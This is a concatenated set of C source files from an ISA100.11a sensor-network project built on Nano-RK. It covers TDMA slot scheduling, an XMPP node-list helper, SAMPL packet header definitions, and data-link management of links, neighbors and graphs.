isa_sched[9] = 1;
}
else if(isa_node_mode==ISA_RECIPIENT){
isa_tdma_tx_mask |= ((uint32_t) 1) << 1;
//isa_tdma_rx_mask |= ((uint32_t) 1) << 1;//change for test
isa_tdma_rx_mask |= ((uint32_t) 1) << 4;
//isa_tdma_rx_mask |= ((uint32_t) 1) << 0;
// isa_sched[0] = 1;
//isa_sched[1] = 1;//change for test
isa_sched[1] = 1;
isa_sched[4] = 1;
}
/*printf("isa_scheduler.h, isa_set_schedule():\n\r");
for(i=0;i<25;i++)
printf("%d,",isa_sched[i]);
printf("\n\r");*/
return NRK_OK;
}
/**
* isa_get_schedule()
*
* This function returns the stored schedule for a particular slot.
*
* Return: schedule value
*/
int8_t isa_get_schedule (uint8_t slot)
{
if (slot > ISA_SLOTS_PER_FRAME)
return NRK_ERROR;
return isa_sched[slot];
}
/**
* _isa_clear_sched_cache()
*
* This function is called by the timer interrupt at the
* start of each ISA cycle to remove any cached scheduling
* values. Only call this if you are reseting the ISA frames.
*/
void _isa_clear_sched_cache ()
{
uint8_t i;
// FIXME compress this shit later...
for (i = 0; i < ISA_SLOTS_PER_FRAME; i++) {
isa_sched[i] = 0;
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/projects/SAMPL/slip-clients/xmpp-client/node_list.c
#include "node_list.h"
#include <stdint.h>
#include <time.h>
#include <string.h>
#include <stdio.h>
#include "lm-library.h"
#include "globals.h"
char nodeIDs[MAX_NODE_ELEMENTS][MAX_NODE_LEN];
uint8_t node_id_cnt;
void node_list_init()
{
int i;
node_id_cnt=0;
for(i=0; i<MAX_NODE_ELEMENTS; i++ ) nodeIDs[i][0]='\0';
}
int node_list_exists(char *name)
{
int i;
for(i=0; i<node_id_cnt; i++ )
if(strcmp(name,nodeIDs[i])==0) return 1;
return 0;
}
int node_list_add(char *name)
{
if(node_id_cnt<MAX_NODE_ELEMENTS)
{
strcpy( nodeIDs[node_id_cnt], name );
node_id_cnt++;
return 1;
}
return 0;
}
void check_and_create_node(char *node_name)
{
int ret;
char buf[1024];
char timeStr[64];
time_t timestamp;
// If I have already created the node this run
if( node_list_exists(node_name)==0)
{
// Add it to my list to stop creating new nodes
node_list_add(node_name);
// generate parent node for gateway
ret = create_event_node(connection, node_name,NULL,FALSE);
if(ret != XMPP_NO_ERROR) {
if(ret == XMPP_ERROR_NODE_EXISTS)
{
if(debug_txt_flag) printf("Node '%s' already exists\n",node_name);
} else {
g_printerr("Could not create event node '%s'. Error='%s'\n",node_name,ERROR_MESSAGE(ret));
return;
}
}
else
{
if(debug_txt_flag) printf("Created event node '%s'\n",node_name);
// First time add a description of node
// publish XML data for node
    time(&timestamp);
    strftime(timeStr,100,"%Y-%m-%d %X",localtime(&timestamp));
sprintf(buf,"<Node id=\"%s\" type=\"FIREFLY\" description=\"A Firefly Node\" timestamp=\"%s\"></Node>",node_name,timeStr);
if(xmpp_flag==1) ret = publish_to_node(connection,node_name,buf);
}
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/SAMPL/slip-clients/xmpp-client/.svn/text-base/node_list.h.svn-base
#ifndef _NODE_LIST_H_
#define _NODE_LIST_H_
#define MAX_NODE_LEN 32
#define MAX_NODE_ELEMENTS 64
int node_list_add(char *name);
int node_list_exists(char *name);
void node_list_init();
void check_and_create_node(char *node_name);
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/transducer_pkt.h
#ifndef _TRANSDUCER_PKT_H
#define _TRANSDUCER_PKT_H
#include <../include/sampl.h>
#define TRANSDUCER_REPLY_HEADER_SIZE 3
#define TRANSDUCER_ELEMENT_SIZE 3
#define GLOBAL_DEBUG_MASK 0x01
typedef struct transducer_msg
{
uint8_t mac_addr;
uint8_t key;
uint8_t value;
} TRANSDUCER_MSG_T;
typedef struct transducer_cmd_pkt
{
uint8_t checksum; // Byte 0
uint8_t num_msgs; // Byte 1
TRANSDUCER_MSG_T *msg;
} TRANSDUCER_CMD_PKT_T;
typedef struct transducer_reply_pkt
{
uint8_t mac_addr;
uint8_t type;
uint8_t len;
uint8_t *payload;
} TRANSDUCER_REPLY_PKT_T;
int8_t transducer_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out);
int8_t transducer_generate(SAMPL_UPSTREAM_PKT_T *pkt, SAMPL_DOWNSTREAM_PKT_T *ds_pkt);
// This function returns a computed checksum to compare against the normal checksum
uint8_t transducer_cmd_pkt_get( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf);
uint8_t transducer_cmd_pkt_add( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf);
uint8_t transducer_reply_pkt_add( TRANSDUCER_REPLY_PKT_T *p, uint8_t *buf, uint8_t index );
uint8_t transducer_reply_pkt_get( TRANSDUCER_REPLY_PKT_T *p, uint8_t *buf, uint8_t index );
uint8_t transducer_cmd_pkt_checksum( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf);
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/include/sampl.h
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
*******************************************************************************/
#ifndef SAMPL_H
#define SAMPL_H
#include <stdint.h>
#ifndef NRK_ERROR
#define NRK_ERROR (-1)
#endif
#ifndef NRK_OK
#define NRK_OK 1
#endif
// #define DEBUG_TXT
#define MAX_PKT_PAYLOAD (120-US_PAYLOAD_START)
#define GATEWAY_MAC 0
/* NOTE: THE SIZE OF CONTROL PACKET SHOULD BE LESS THAN RF_MAX_PAYLOAD_SIZE */
#define MAX_NODES 30
#define WORDS_PER_NODE 2
#define SAMPL_ID 1
#define SAMPL_VERSION 1
#define FAST_CHECK_RATE 100
#define BROADCAST 255
// limits
#define MAX_NAV 240
#define MAX_DELAY_PER_LEVEL 5
#define MAX_HOPS 32
#define DEFAULT_CHECK_RATE 100
// error flags for packets
#define HOP_ERROR_MASK 0x01
#define NAV_ERROR_MASK 0x02
#define DELAY_PER_LEVEL_ERROR_MASK 0x04
#define MAX_HOPS_ERROR_MASK 0x08
// ctrl_flag MASKS
#define DS_MASK 0x01
#define US_MASK 0x02
#define TREE_FILTER 0x04
#define LED_FLOOD 0x08
#define LINK_ACK 0x10
#define ENCRYPT 0x20
#define MOBILE_MASK 0x40
#define DEBUG_FLAG 0x80
// PKT Types
#define EMPTY_PKT 0x00
#define PING_PKT 0x01
#define WIRELESS_UPDATE_PKT 0x02
#define ACK_PKT 0x03
#define ERROR_PKT 0x04
#define ROUTE_PKT 0x05
#define FF_SENSOR_LONG_PKT 0x06
#define FF_SENSOR_SHORT_PKT 0x07
#define TRACEROUTE_PKT 0x08
#define CONTROL_PKT 0x09
#define LED_CONTROL_PKT 0x0a
#define DATA_STORAGE_PKT 0x0b
#define XMPP_PKT 0x0c
#define STATS_PKT 0x0d
#define SUBNET_NEIGHBOR_LIST_PKT 0x0e
#define EXTENDED_NEIGHBOR_LIST_PKT 0x0f
#define TRANSDUCER_REPLY_PKT 0x10
#define TRANSDUCER_CMD_PKT 0x11
#define UNKNOWN_PKT 0xff
// UNKNOWN_PKT used by phoenix etc, do not remove
// Common to all packets
#define PROTOCOL_ID 0
#define PROTOCOL_VERSION 1
#define CTRL_FLAGS 2
#define PKT_TYPE 3
#define SEQ_NUM 4
#define PRIORITY 5
#define ACK_RETRY 5
#define SUBNET_MAC 8 // when operating in 8 bit mode
#define SUBNET_MAC_2 6
#define SUBNET_MAC_1 7
#define SUBNET_MAC_0 8
// Common to downstream packets
#define DS_LAST_HOP_MAC 9
#define DS_HOP_CNT 10
#define DS_HOP_MAX 11
#define DS_DELAY_PER_LEVEL 12
#define DS_NAV 13
#define DS_MAC_CHECK_RATE 14
#define DS_RSSI_THRESHOLD 15
#define DS_AES_CTR_3 16
#define DS_AES_CTR_2 17
#define DS_AES_CTR_1 18
#define DS_AES_CTR_0 19
#define DS_MAC_FILTER_LIST_SIZE 20
#define DS_PAYLOAD_START 21
// Common to upstream reply packets
#define US_LAST_HOP_SRC_MAC 9
#define US_NEXT_HOP_DST_MAC 10
#define US_ERROR_CODE 11
#define US_NUM_MSGS 12
#define US_PAYLOAD_START 13
// Common to mobile packets
#define P2P_SRC_MAC 9
#define P2P_DST_MAC 10
#define P2P_LAST_HOP_MAC 11
#define P2P_NEXT_HOP_MAC 12
#define P2P_TTL 13
#define P2P_CHECK_RATE 14
#define P2P_PAYLOAD_START 15
// Common to gateway packets
#define GW_LAST_HOP_MAC 9
#define GW_RSSI 10
#define GW_SRC_MAC 11
#define GW_DST_MAC 12
#define GW_ERROR_CODE 13
#define GW_NUM_MSGS 14
#define GW_PAYLOAD_START 15
typedef struct sampl_downstream_pkt
{
// Common Header
uint8_t protocol_id;
uint8_t protocol_version;
uint8_t pkt_type;
uint8_t ctrl_flags;
uint8_t seq_num;
uint8_t priority;
uint8_t ack_retry;
uint8_t subnet_mac[3];
// DS Specific Payload
uint8_t hop_cnt;
uint8_t hop_max;
uint8_t delay_per_level;
uint8_t nav;
uint8_t mac_check_rate;
int8_t rssi_threshold;
uint8_t last_hop_mac;
uint8_t mac_filter_num;
uint8_t aes_ctr[4];
// Buffer Management
uint8_t payload_start;
uint8_t *buf;
uint8_t buf_len;
uint8_t *payload;
uint8_t payload_len;
// Special Flags
uint8_t is_mac_selected;
int8_t rssi;
} SAMPL_DOWNSTREAM_PKT_T;
typedef struct sampl_gateway_pkt
{
// Common Header
uint8_t protocol_id;
uint8_t protocol_version;
uint8_t pkt_type;
uint8_t ctrl_flags;
uint8_t subnet_mac[3];
uint8_t ack_retry;
uint8_t priority;
uint8_t seq_num;
// GW Specific Values
uint8_t error_code;
uint8_t num_msgs;
uint8_t src_mac;
uint8_t dst_mac; // 255 is a broadcast
uint8_t last_hop_mac;
int8_t rssi;
// Buffer Management
uint8_t payload_start;
uint8_t *buf;
uint8_t buf_len;
uint8_t *payload;
uint8_t payload_len;
}SAMPL_GATEWAY_PKT_T;
typedef struct sampl_upstream_pkt
{
// Common Header
uint8_t protocol_id;
uint8_t protocol_version;
uint8_t pkt_type;
uint8_t ctrl_flags;
uint8_t subnet_mac[3];
uint8_t ack_retry;
uint8_t priority;
uint8_t seq_num;
// US Specific Values
uint8_t error_code; // Allow errors to be sent up
uint8_t next_hop_dst_mac;
uint8_t last_hop_src_mac;
uint8_t num_msgs;
// Buffer Management
uint8_t payload_start;
uint8_t *buf;
uint8_t buf_len;
uint8_t *payload;
uint8_t payload_len;
// Special Flags
int8_t rssi;
}SAMPL_UPSTREAM_PKT_T;
typedef struct sampl_peer_2_peer_pkt
{
// Common Header
uint8_t protocol_id;
uint8_t protocol_version;
uint8_t pkt_type;
uint8_t ctrl_flags;
uint8_t subnet_mac[3];
uint8_t ack_retry;
uint8_t priority;
uint8_t seq_num;
// General Purpose Packet Specific
uint8_t ttl; // Time to live
uint8_t src_mac;
uint8_t dst_mac; // 255 is a broadcast
uint8_t last_hop_mac;
uint8_t next_hop_mac;
uint8_t check_rate;
// Buffer Management
uint8_t payload_start;
uint8_t *buf;
uint8_t buf_len;
uint8_t *payload;
uint8_t payload_len;
// Special Flags
int8_t rssi;
}SAMPL_PEER_2_PEER_PKT_T;
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/dlmo.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
*******************************************************************************/
//#include <rtl_debug.h>
#include <include.h>
#include <ulib.h>
#include <avr/sleep.h>
#include <avr/wdt.h>
#include <avr/eeprom.h>
#include <stdio.h>
#include <avr/interrupt.h>
#include <nrk.h>
#include <nrk_events.h>
#include <nrk_timer.h>
#include <nrk_error.h>
//#include <rtl_defs.h>
#include <stdlib.h>
#include <isa_error.h>
#include <dmo.h>
#include <dlmo.h>
#include <isa_messagetypes.h>
//********************** Global variables*************************************
volatile DLMO_LINK dlmoLink[DLMO_LINK_MAX_COUNT];
volatile DLMO_NEIGHBOR dlmoNeighbor[DLMO_NEIGHBOR_MAX_COUNT];
volatile DLMO_GRAPH dlmoGraph[DLMO_GRAPH_MAX_COUNT];
volatile ISA_QUEUE isaQueue[TRANSMIT_QUEUE_MAX_SIZE] ;
volatile DLMO_CANDIDATE dlmoCandidate;
//ISA_QUEUE *isaQueuePointer[TRANSMIT_QUEUE_MAX_SIZE]
uint8_t isa_sched[ISA_SLOTS_PER_FRAME];
uint64_t isa_tdma_rx_mask; //should not need this
uint64_t isa_tdma_tx_mask; // should not need this
uint64_t isa_slot; //Set to 1 if slot is in use
uint8_t isaTxQueueSize; //holds the number of elements present in the Queue
/* Device management object*/
DMO dmo;
DLMO_DISCOVERY_ALERT discoveryAlert;
/* Variables for neighbor table transmission */
nrk_time_t lastSentTime;
uint8_t nbr_buf[RF_MAX_PAYLOAD_SIZE];
//********************Local function definitions***********************************
void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource, uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3, uint8_t graphType);
void dlmoInit();
DLMO_GRAPH* addGraph(uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3);
int8_t addLink(uint8_t slotNumber, uint16_t neighborId,uint16_t graphId , LinkType linkType, GraphType graphType);
DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2, bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate);
int8_t dd_data_request(uint16_t srcAddr, uint16_t destAddr, uint8_t priority, bool discardEligible, uint8_t ecn, bool lh, uint8_t contractId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry ,status));
void dd_data_indication(uint16_t srcAddr,uint16_t destAddr,uint8_t priority,bool discardEligibile, bool lh, uint8_t length, uint8_t *payload);
void sendPacket(uint16_t destAddr,uint8_t graphId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status)) ;
int8_t enQueue(uint16_t neighbor, uint8_t priority, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status));
void isaFreePacket(ISA_QUEUE *entry);
/*------------------------------------------------- dlmoInit() -----
| Function dlmoInit()
|
| Purpose: Called during initialization. This can also be used later to reset to
| factory defaults if required. In its current state, it doesn't really do much
| except set the neighbor table reporting duration
|
|
| Parameters:
| NONE
|
| Returns:
| NONE
*-------------------------------------------------------------------*/
void dlmoInit()
{
uint8_t i;
//for LINK
for (i=0; i<DLMO_LINK_MAX_COUNT; i++)
{
	   dlmoLink[i].isPresent = false;
}
//for NEIGHBOR
for(i=0; i<DLMO_NEIGHBOR_MAX_COUNT; i++)
{
dlmoNeighbor[i].isPresent = false;
}
//Initialization for Transmit Queue
isaTxQueueSize = 0; //Explicitly initialize this to 0
/*
for(i=0; i<TRANSMIT_QUEUE_MAX_SIZE; i++)
{
isaQueuePointer[i] = &isaQueue[i];
}
*/
	// Initialize the dlmo.DiscoveryAlert field
discoveryAlert.alertReport.alertReportDisabled = false;
discoveryAlert.duration = 60; //in seconds
//initialize the lastSentTime to the startTime
nrk_time_get(&lastSentTime);
}
DLMO_GRAPH* findGraph(uint16_t graphId){
for(uint8_t i=0;i<DLMO_GRAPH_MAX_COUNT;i++)
{
if(graphId == dlmoGraph[i].index) return &dlmoGraph[i];
}
return NULL;
}
DLMO_NEIGHBOR* findNeighbor(uint16_t neighborId){
for(uint8_t i=0;i<DLMO_NEIGHBOR_MAX_COUNT;i++)
{
if(neighborId == dlmoNeighbor[i].index) return &dlmoNeighbor[i];
}
return NULL;
}
/*------------------------------------------------- addLink() -----
| Function addLink()
|
| Purpose: Used to add/update a link. If the link is already present, its contents will get updated.
|
|
| Parameters:
|	  (IN)uint8_t slotNumber - This is currently stored as channelOffset and represents the slot at which this link appears.
| (IN)DLMO_NEIGHBOR* neighborIndex - Pointer to the neighbor that is stored in this link. This parameter can also be NULL in the case of
| an ADV or RX link.
| (IN)DLMO_GRAPH* graphPtr - Pointer to the graph that is stored in this link. This parameter can also be NULL in the case of an ADV or
| RX link.
| (IN)LinkType linkType - Represents the linkType
| JOIN_RESP,
| TX_NO_ADV,
| TX_RX_NO_ADV,
| TX_ADV,
| ADV,
| BURST_ADV,
| BURST_ADV_SCAN,
| SOLICITATION,
| RX
| (IN)GraphType graphType - Additional type of TX link. This represents whether the link can be used to forward directly to a NEIGHBOR, or
| if the link is used only for a message that is destined for a GRAPH or if both GRAPH and NEIGHBOR (GRAPH) being
| given preference
| Returns:
| ISA_SUCCESS
| ISA_ERROR
*-------------------------------------------------------------------*/
int8_t addLink(uint8_t slotNumber, uint16_t neighborId, uint16_t graphId , LinkType linkType, GraphType graphType)
{
uint8_t index;
int8_t freeIndex = -1;
DLMO_NEIGHBOR* neighborPtr = NULL; // neighbor pointer to store
DLMO_GRAPH* graphPtr = NULL; // graph pointer to store
if (slotNumber >= ISA_MAX_SLOTS) {
printf ("Slot number not in range\r\n");
	   return ISA_ERROR;
}
for (index = 0; index < DLMO_LINK_MAX_COUNT; index++)
{
if (freeIndex==-1 && dlmoLink[index].isPresent == false) freeIndex = index;
if (dlmoLink[index].chOffset == slotNumber) {
printf ("Slot %d already configured- updating\r\n",slotNumber);
freeIndex = index;
goto UPDATE_LINK;
}
}
if (freeIndex == -1)
{
setIsaError(LINK_CAPACITY_ERROR);
printIsaError();
return ISA_ERROR;
}
//we have found a free index
UPDATE_LINK:
if (linkType == TX_NO_ADV){
//find the neighbor pointer
if (neighborId!=0)
{
neighborPtr = findNeighbor(neighborId);
}
//find the graph pointer
if (graphId!=0)
{
graphPtr = findGraph(graphId);
}
}
printf("Added link at index %d\r\n",freeIndex);
dlmoLink[freeIndex].isPresent = true;
dlmoLink[freeIndex].neighbor = neighborPtr;
dlmoLink[freeIndex].graphPtr = graphPtr;
dlmoLink[freeIndex].linkType = linkType;
//reset the previous slot number before updating
// isa_slot &= ~(((uint64_t) 1) << dlmoLink[freeIndex].chOffset);
dlmoLink[freeIndex].chOffset = slotNumber;
dlmoLink[freeIndex].graphPtr = graphPtr;
   dlmoLink[freeIndex].typeInfo = ISASET(dlmoLink[freeIndex].typeInfo, SHIFTLEFT(graphType, GRAPH_TYPE_BIT)); // store the graph type bits for this link
// channel offset implementation will change as the protocol develops
//record that the slot is in use- used to calculate next wakeup
if(slotNumber == 23) putchar('x');
isa_slot |= ((uint64_t) 1) << slotNumber;
return ISA_SUCCESS;
}
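/*
 * Configuration sketch (hypothetical, mirroring the calls in the project
 * main.c files): a transmit link to neighbor 1 on slot 4 and a plain
 * receive link on slot 3.  The neighbor must already have been added
 * with addNeighbor() for the lookup above to succeed.
 */
static void exampleAddLinks ()
{
	addLink (4, 1, 0, TX_NO_ADV, NEIGHBOR); // slot 4: TX to neighbor 1, no graph
	addLink (3, 0, 0, RX, NEIGHBOR);        // slot 3: receive-only, no neighbor/graph
}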
/*------------------------------------------------- findLink() -----
| Function findLink()
|
|  Purpose:  This returns a pointer to the link that corresponds to the slot passed to it.
|			 The function runs through the dlmoLink[] array and compares the slot with the channel offset parameter
| for valid links.
|
|
| Parameters:
| (IN)uint8_t slot - Slot for which we want the link pointer
|
| Returns:
| DLMO_LINK * - Pointer to the link that corresponds to the slot passed as an argument.
*-------------------------------------------------------------------*/
DLMO_LINK * findLink(uint8_t slot){
uint8_t index;
for (index = 0; index < DLMO_LINK_MAX_COUNT; index++)
{
if (dlmoLink[index].isPresent == true && dlmoLink[index].chOffset == slot ) {
return &dlmoLink[index];
}
}
printf ("This slot is not configured yet: %d\n\r" , slot);
return NULL;
}
/*------------------------------------------------- isTransmitLinkPresent() -----
| Function isTransmitLinkPresent()
|
| Purpose: This function is called before we enqueue something in the queue in order to determine if
| we have a link that can be used to send this message
| We know we have a TX link if either -
| 1) The graphType is NEIGHBOR or GRAPH_NEIGHBOR and the DEST_ID of the message is equal to the
| neighbor on the link or
| 2) the graph_id of the message corresponds to the graphId of the link and the graphType(of the link) is GRAPH or GRAPH_NEIGHBOR
| This function runs through all the links to find if either 1 or 2 is true
|
|
| Parameters:
| (IN)uint8_t *payload - Pointer to the message payload
|
| Returns:
| true
| false
*-------------------------------------------------------------------*/
bool isTransmitLinkPresent (uint8_t *payload){
uint8_t index;
uint8_t graphType;
//check the link type
	DLMO_DROUT * dRout = (DLMO_DROUT *)&payload[DROUT_INDEX];
for (index = 0; index < DLMO_LINK_MAX_COUNT; index++)
{
//first find the graph type
graphType = ISAMASK(dlmoLink[index].typeInfo,GRAPH_TYPE_MASK);
graphType = SHIFTRIGHT(graphType,GRAPH_TYPE_BIT);
if (dlmoLink[index].isPresent == true && dlmoLink[index].linkType == TX_NO_ADV ) { //this is a valid TX link
//the link neighbor is equal to payload destID and the graph type is NEIGHBOR or GRAPH_NEIGHBOR or link graphId is equal to the message graphID and the link type is GRAPH or GRAPH_NEIGHBOR
if ((dlmoLink[index].neighbor->index == payload[DEST_INDEX] && (graphType == NEIGHBOR || graphType == GRAPH_NEIGHBOR))|| (dlmoLink[index].graphPtr->index !=0 && dlmoLink[index].graphPtr->index==dRout->GraphId&& (graphType == GRAPH || graphType == GRAPH_NEIGHBOR)) )
return true;
}
}
return false; //we do not have a link that is configured for this graphId
}
/*------------------------------------------------- addNeighbor() -----
| Function addNeighbor()
|
| Purpose: Used to add/update a neighbor. If the neighbor is already present, its contents will get updated.
|
|
| Parameters:
| (IN)uint16_t index - Neighbor ID to store/update
| (IN)uint64_t EUI64 - Currently unused
| (IN)uint8_t groupCode1 - Currently unused
| (IN)uint8_t groupCode2 - Currently unused
| (IN)bool clockSource - TRUE - if this neighbor is my clock source
| FALSE - if this neighbor is not my clock source
| (IN)uint8_t linkBacklogIndex - Currently unused
| (IN)uint8_t linkBacklogDur - Currently unused
| (IN)uint8_t linkBacklogActivate - Currently unused
|
|
| Returns:
| DLMO_NEIGHBOR* - pointer to the neighbor added/updated
*-------------------------------------------------------------------*/
DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2, bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate)
{
	uint8_t free_index=0;
bool free_index_present = false;
for(uint8_t i=0;i<DLMO_NEIGHBOR_MAX_COUNT;i++)
{
if(index == dlmoNeighbor[i].index && dlmoNeighbor[i].isPresent == true)
{
printf("Neighbor %d Exists in Table - updating\n\r",index);
free_index = i;
goto UPDATE_NEIGHBOR;
}
if(dlmoNeighbor[i].isPresent == false && free_index_present == false)
{
free_index_present = true;
free_index = i;
}
}
if(free_index_present == false)
{
setIsaError(NEIGHBOR_CAPACITY_ERROR);
printIsaError();
return NULL;
}
else
{
printf("Added Neighbor at Index %d\r\n",free_index);
UPDATE_NEIGHBOR:
dlmoNeighbor[free_index].index = index;
dlmoNeighbor[free_index].isPresent = true;
dlmoNeighbor[free_index].EUI64 = EUI64;
dlmoNeighbor[free_index].groupCode1 = groupCode1;
dlmoNeighbor[free_index].groupCode2 = groupCode2;
if(clockSource == true) dlmoNeighbor[free_index].typeInfo = ISASET(dlmoNeighbor[free_index].typeInfo,CLOCK_PREFERRED);
dlmoNeighbor[free_index].linkBacklogIndex = linkBacklogIndex;
dlmoNeighbor[free_index].linkBacklogDur = linkBacklogDur;
dlmoNeighbor[free_index].linkBacklogActivate = linkBacklogActivate;
return &dlmoNeighbor[free_index];
}
}
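/*
 * Usage sketch (hypothetical, matching the repeater main.c): register the
 * clock source and one ordinary neighbor.  The EUI64, group code and
 * backlog parameters are currently unused and simply passed as 0.
 */
static void exampleAddNeighbors ()
{
	addNeighbor (1, 0, 0, 0, true, 0, 0, 0);  // neighbor 1 is also my clock source
	addNeighbor (5, 0, 0, 0, false, 0, 0, 0); // plain neighbor, not a clock source
}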
/*------------------------------------------------- addGraph() -----
| Function addGraph()
|
| Purpose: Used to add/update a graph . If the graph is already present, its contents will get updated.
|
|
| Parameters:
| (IN)uint16_t graphId - Graph ID to store/update
| (IN)uint8_t neighborCount - Number of neighbors in the preference list
| (IN)uint16_t n1 - Neighbor 1 (higher priority)
| (IN)uint16_t n2 - Neighbor 2
| (IN)uint16_t n3 - Neighbor 3
|
| Returns:
| DLMO_GRAPH* - pointer to the graph added/updated
*-------------------------------------------------------------------*/
DLMO_GRAPH* addGraph(uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3){
//printf("AddGraph Graph ID: %d\r\n",graphId);
	uint8_t free_index=0;
bool free_index_present = false;
for(uint8_t i=0;i<DLMO_GRAPH_MAX_COUNT;i++)
{
if(graphId == dlmoGraph[i].index)
{
printf("Graph %d Exists in Table -updating\n\r",graphId);
free_index = i;
goto UPDATE_GRAPH;
}
if(dlmoGraph[i].index == 0 && free_index_present == false) //is not configured
{
free_index_present = true;
free_index = i;
}
}
if(free_index_present == false)
{
setIsaError(GRAPH_CAPACITY_ERROR);
printIsaError();
return NULL;
}
else
{
printf("Added graph at index %d\r\n",free_index);
UPDATE_GRAPH:
dlmoGraph[free_index].index = graphId;
dlmoGraph[free_index].info = ISASET(SHIFTLEFT(neighborCount, NEIGHBOR_COUNT_LOWER_BIT), dlmoGraph[free_index].info ); //set the neighbor count
dlmoGraph[free_index].neighbor[0] = n1;
dlmoGraph[free_index].neighbor[1] = n2;
dlmoGraph[free_index].neighbor[2] = n3;
return &dlmoGraph[free_index];
}
}
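/*
 * Usage sketch (hypothetical, as configured in the repeater main.c):
 * graph 1 routes preferentially through neighbor 4; the remaining
 * preference slots stay 0 (unused).
 */
static void exampleAddGraph ()
{
	addGraph (1, 1, 4, 0, 0); // graph 1, one preferred neighbor: node 4
}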
/*
void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource, uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3, GraphType graphType)
{
DLMO_NEIGHBOR* neighborIndex;//store the neighbor index to pass to addLink()
DLMO_GRAPH* graphPtr ;
if (slotNumber >= ISA_MAX_SLOTS) {
printf ("Slot number not in range");
return;
}
if (linkType == TX_NO_ADV){
//Call the function to add a neighbor as long as neighboe ID is not zero
if (neighborId!=0)
{
putchar('z');
neighborIndex = addNeighbor(neighborId,0, 0, 0, clockSource,0,0, 0);
if (neighborIndex == NULL)//
{
printIsaError();
return;
}
}
if (graphId !=0){
putchar('y');
graphPtr = addGraph(graphId, neighborCount, n1, n2, n3);
if (graphPtr == NULL)//
{
printIsaError();
return;
}
}
}
if (addLink(slotNumber, neighborIndex,graphPtr, linkType, graphType) == -1)
{
printIsaError();
return;
}
//record that the slot is in use- used to calculate next wakeup
isa_slot |= ((uint64_t) 1) << slotNumber;
}
*/
/**
* isa_get_slots_until_next_wakeup()
*
* This function returns the absolute number of slots between the current_slot
* and the next RX/TX related wakeup.
*
* Argument: current_slot is the current slot
* Return: uint16_t number of slots until the next wakeup
*/
uint16_t isa_get_slots_until_next_wakeup (uint16_t current_global_slot)
{
uint16_t min_slot;
uint8_t test_slot;
uint8_t current_local_slot;
uint64_t testVariable = 0;
current_local_slot = current_global_slot%ISA_SLOTS_PER_FRAME;
// printf("current local slot %d\r\n",current_local_slot);
testVariable |= ((uint64_t)1) << (current_local_slot+1);
for (test_slot = current_local_slot+1; test_slot < ISA_SLOTS_PER_FRAME; test_slot++) {
if(isa_slot & testVariable) { //slot is scheduled
min_slot = test_slot-current_local_slot;
return min_slot;
}
testVariable = testVariable << 1;
}
// scheduled slot wrapped back
testVariable = 1;
for (test_slot = 0; test_slot<=current_local_slot;test_slot++){
if(isa_slot & testVariable){ //slot is scheduled
min_slot = (ISA_SLOTS_PER_FRAME - current_local_slot + test_slot);
return min_slot;
}
testVariable = testVariable << 1;
}
	// no slot is scheduled at all; default to waiting a full frame
	return ISA_SLOTS_PER_FRAME;
}
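/*
 * Worked example (assuming ISA_SLOTS_PER_FRAME is 25): with the current
 * local slot at 23 and only bit 4 set in isa_slot, the forward scan
 * checks slot 24 and misses, the wrap-around scan hits test_slot 4, and
 * the function returns 25 - 23 + 4 = 6 slots until the next wakeup.
 */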
// *** Data link layer service access points ****
